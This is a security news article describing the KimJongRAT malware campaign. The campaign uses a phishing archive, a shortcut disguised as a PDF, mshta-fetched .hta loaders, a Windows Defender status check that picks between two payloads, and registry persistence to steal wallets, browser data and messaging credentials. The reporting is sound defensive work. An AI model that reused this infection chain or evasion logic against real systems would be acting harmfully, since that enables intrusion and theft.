KimJongRAT Attacking Windows Users via Weaponized .hta Files to Steal Logins

A new remote access trojan dubbed KimJongRAT has surfaced, posing a severe threat to Windows users.

This sophisticated malware is believed to be orchestrated by the Kimsuky group, a threat actor with alleged state backing.

The campaign typically begins with a phishing email containing a deceptive archive named National Tax Notice, which lures unsuspecting victims into initiating the infection chain.

Upon opening the malicious archive, users are presented with a shortcut file disguised as a legitimate PDF document.

When executed, this shortcut file triggers a hidden command that decodes a Base64 URL and abuses the legitimate Microsoft HTML Application utility to contact a remote server.

This process stealthily downloads an additional payload known as tax.hta, effectively bypassing standard security checks.

Alyac security analysts identified that this loader script is implemented in VBScript and employs clever evasion techniques.

The malware attempts to evade detection by utilizing legitimate services like Google Drive to host its malicious components.

Once active, the loader retrieves both decoy documents to trick the user and the actual malicious binaries required for the next stage of the attack.

Exfiltration of sensitive data

The primary objective of this campaign is the exfiltration of sensitive personal and financial data.

The malware targets a wide array of information, including system details, browser storage data, and encryption keys.

It specifically hunts for cryptocurrency wallet information and credentials for communication platforms like Telegram and Discord, making it a highly dangerous tool for identity theft and financial fraud.

The most notable aspect of KimJongRAT is its ability to adapt its behavior based on the target environment’s security posture.

The malware executes a specific VBScript command to check the status of Windows Defender before proceeding.

It uses the code snippet Set exec = oShell.Exec(ss) followed by If InStr(output, “STOPPED”) > 0 Then to determine if the security service is active.

If Windows Defender is disabled, the malware downloads a file named v3.log, which executes the primary payload.

Conversely, if security is active, it retrieves an alternative file called pipe.log to circumvent detection.

Regardless of the path taken, the malware establishes persistence by registering itself in the system registry, ensuring it runs automatically to transmit stolen data periodically.

While the List of cryptocurrency wallets hijacked by malware highlights the breadth of targeted applications, it also highlights the specific financial intent behind this tailored threat.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.